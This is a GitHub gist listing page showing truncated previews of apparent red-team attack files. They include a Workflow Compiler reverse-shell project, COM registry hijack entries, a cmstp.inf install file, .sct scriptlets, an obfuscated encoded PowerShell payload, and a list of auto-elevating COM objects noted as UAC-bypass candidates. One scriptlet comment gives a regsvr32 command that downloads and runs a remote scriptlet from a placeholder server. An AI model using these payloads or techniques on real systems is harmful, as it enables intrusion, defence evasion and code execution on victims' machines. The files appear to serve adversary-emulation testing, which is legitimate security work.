Elm0D Elm0D
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <?xml version="1.0" encoding="utf-8"?> | |
| <CompilerInput xmlns:i="http://www.w3.org/2001/XMLSchema-instance" xmlns="http://schemas.datacontract.org/2004/07/Microsoft.Workflow.Compiler"> | |
| <files xmlns:d2p1="http://schemas.microsoft.com/2003/10/Serialization/Arrays"> | |
| <d2p1:string>Rev.Shell</d2p1:string> | |
| </files> | |
| <parameters xmlns:d2p1="http://schemas.datacontract.org/2004/07/System.Workflow.ComponentModel.Compiler"> | |
| <assemblyNames xmlns:d3p1="http://schemas.microsoft.com/2003/10/Serialization/Arrays" xmlns="http://schemas.datacontract.org/2004/07/System.CodeDom.Compiler" /> | |
| <compilerOptions i:nil="true" xmlns="http://schemas.datacontract.org/2004/07/System.CodeDom.Compiler" /> | |
| <coreAssemblyFileName xmlns="http://schemas.datacontract.org/2004/07/System.CodeDom.Compiler"></coreAssemblyFileName> | |
| <embeddedResources xmlns:d3p1="http://schemas.microsoft.com/2003/10/Serialization/Arrays" xmlns="http://schemas.datacontract.org/2004/07/System.CodeDom.Compiler" /> |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| using System; | |
| using System.Text; | |
| using System.IO; | |
| using System.Diagnostics; | |
| using System.ComponentModel; | |
| using System.Net; | |
| using System.Net.Sockets; | |
| using System.Workflow.Activities; | |
| using System.Security.Cryptography; | |
| using System.Reflection; |
Elm0D
/ jquery.binarytransport.js
Created
September 17, 2018 22:46
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| /** | |
| * | |
| * jquery.binarytransport.js | |
| * | |
| * @description. jQuery ajax transport for making binary data type requests. | |
| * @version 1.0 | |
| * @author Henry Algus <henryalgus@gmail.com> | |
| * | |
| */ |
Elm0D
/ winlogon.reg
Created
February 13, 2018 15:44
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| Windows Registry Editor Version 5.00 | |
| [HKEY_CURRENT_USER\SOFTWARE\Classes\AtomicRedTeam.1.00] | |
| @="AtomicRedTeam" | |
| [HKEY_CURRENT_USER\SOFTWARE\Classes\AtomicRedTeam.1.00\CLSID] | |
| @="{00000001-0000-0000-0000-0000FEEDACDC}" | |
| [HKEY_CURRENT_USER\SOFTWARE\Classes\AtomicRedTeam] | |
| @="AtomicRedTeam" | |
| [HKEY_CURRENT_USER\SOFTWARE\Classes\AtomicRedTeam\CLSID] | |
| @="{00000001-0000-0000-0000-0000FEEDACDC}" | |
| [HKEY_CURRENT_USER\SOFTWARE\Classes\CLSID\{00000001-0000-0000-0000-0000FEEDACDC}] |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| ;cmstp.exe /s cmstp.inf | |
| [version] | |
| Signature=$chicago$ | |
| AdvancedINF=2.5 | |
| [DefaultInstall_SingleUser] | |
| UnRegisterOCXs=UnRegisterOCXSection | |
| [UnRegisterOCXSection] |
Elm0D
/ Scriptlet_MSG.sct
Last active
January 31, 2018 18:07
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <?xml version="1.0" encoding="utf-8"?> | |
| <package> | |
| <component | |
| id="dummy"> | |
| <registration | |
| description="dummy" | |
| progid="dummy" | |
| version="1.00" | |
| remotable="True"> | |
| <script |
Elm0D
/ Scriptlet.sct
Last active
February 25, 2021 21:05
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <?XML version="1.0"?> | |
| <scriptlet> | |
| <registration | |
| description="Scripting.Dictionary" | |
| progid="Scripting.Dictionary" | |
| version="1" | |
| classid="{AAAA1111-0000-0000-0000-0000FEEDACDC}" | |
| remotable="true" | |
| > |
Elm0D
/ scriptlet_Downloader.sct
Last active
February 25, 2021 21:06
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <?XML version="1.0"?> | |
| <scriptlet> | |
| <registration | |
| description="FofX" | |
| progid="FofX" | |
| version="1.00" | |
| classid="{00001111-0000-0000-0000-0000FEEDACDC}" | |
| > | |
| <!-- regsvr32.exe /s /n /u /i:http://server/scriptlet_Downloader.sct scrobj.dll --> |
Elm0D
/ nurdin344.ps1
Created
November 5, 2017 20:58
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| $KyhNNDbMcOVTCOD = @' | |
| 7b0HYBxJliUmL23Ke39K9UrX4HShCIBgEyTYkEAQ7MGIzeaS7B1pRyMpqyqBymVWZV1mFkDM7Z28995777333nvvvfe6O51OJ/ff/z9cZmQBbPbOStrJniGAqsgfP358Hz8ivvipP+nX+LV/jV/j1/h16P//9//9a/waf9evIc/vqT83PX8Q/f83+V3+nt/k1/jbfuyf/13/rl/z+T//u76ZF026qquLOluk02y5rNp0kqf1epkWy/Tpl6/TRTXLx7/xb5z8bgrj5emv8Ws8/zV/7V/j3rv/+/cxcP+jX+PX+jV/w1/zN/g1fo0nv4YgRs//9QfQP6lp8XvK77+W/dr+/DX+Ifn81+Afv+cf/mv8Gr8Z/8/9tD/4+av+gF/j13iNX/4g917w/EW/xq/xG0U+vvFJf41f4zfw/vwN6O9ve3+P2/xdSz9/nWNpy2Pt9E8f/wHjuqmn+APf/UH682nY7vek/43rvKymiutfpO2e9do9sX/o8x/9AfLz278GXvl1f41/7v6v8Wv8e9/6NX6NX5P+/t1/jV/j1/ut7jueuM3zC3+tLXo1+TV+jW/hf7/W1q+rf/wrza9Pv/1B9N2v0/wG+A1z1/wYfvu18VuC334d/PYb4rdfFzNKIH6N33Ln1+T5ohd/81/jl+L1ioaYJJ/8Gr/et8x3vxZ/B4DVb9z97tfm79BF9Zt0v/t1+Dt0Wv2m3e9+Xf4OaFS/mfnud9z5dX6N34pQ+PXw3a/1x9GP33H0W/ymv8b/9dvgt+q3pmbbv/Zv88mv+dv+Gr/lr/Ob/zoP/wuC8kvpm1/nt/q/fs3f5v/6NX/LX/c3/3VH9/iDfwntt34bal/9tvTPb/nr/ea/3ui3qQnw6rf5439LGurWb0efNr89/fODX+OT3/DXaH4HUAQv/hqd13+r6ndk8oLknyT/wS/5D+o1DeTX/N23f51f+Nt88tv87r/R1u9MX/8G1S9AU0bit/m/fu3/6zf/hfUhdfXbcl |
Elm0D
/ Autoelevated COM objects
Created
October 19, 2017 12:47
List of COM object with enabled elevation. This does not mean they all useful for bypassing UAC or anything like this. Most of them are not. Some of them like Copy/Move/Rename/Delete/Link Object and Shell Security Editor already used by malware. All others need to be investigated, use OleView from Windows SDK for more info. Snapshots taken from …
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| List of COM object with enabled elevation. This does not mean they all useful for bypassing UAC or anything like this. Most of them are not. Some of them like Copy/Move/Rename/Delete/Link Object and Shell Security Editor already used by malware. All others need to be investigated, use OleView from Windows SDK for more info. | |
| Snapshots taken from clean installs. | |
| Windows 7 SP1 x64, 7601 | |
| WPD Association LUA Virtual Factory | |
| {00393519-3A67-4507-A2B8-85146167ACA7} | |
| Virtual Factory for Biometrics | |
| {0142e4d1-fb7a-11dc-ba4a-000ffe7ab428} |
NewerOlder